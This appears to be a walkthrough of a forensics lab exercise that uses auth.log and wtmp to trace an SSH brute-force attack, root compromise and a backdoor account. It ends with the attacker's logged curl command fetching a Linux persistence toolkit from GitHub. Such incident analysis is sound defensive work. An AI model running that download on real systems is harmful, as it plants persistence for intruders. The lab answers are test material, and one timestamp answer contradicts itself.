Task 1 – Analyze the auth.log. What is the IP address used by the attacker to carry out a brute force attack?

• Analyzing the auth.log, we find failed authentications from 65.2.161.68

Task 2 – The bruteforce attempts were successful and attacker gained access to an account on the server. What is the username of the account?

• We find success authentication for the user root

Task 3 – Identify the UTC timestamp when the attacker logged in manually to the server and established a terminal session to carry out their objectives. The login time will be different than the authentication time, and can be found in the wtmp artifact.

• The attacker connected manually at 2024-03-06 06:32:44

• The answer is 2024-03-06 06:32:45

Task 4 – SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

• In the logs we find the session number of the root account:

Task 5 – The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

• In the logs we find that a new user cyberjunkie was added:

Task 6 – What is the MITRE ATT&CK sub-technique ID used for persistence by creating a new account?

• The MITRE technique to create a local account for persistence is T1136.001

Task 7 – What time did the attacker’s first SSH session end according to auth.log?

• In question 4, we found the attacker connected through session 37 as user
• The session 37 as user ended at 2024-03-06 06:37:24

Task 8 – The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

• In the logs, the user executed the following command to download linper.sh, which is a linux persistence toolkit

/usr/bin/curl <https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh>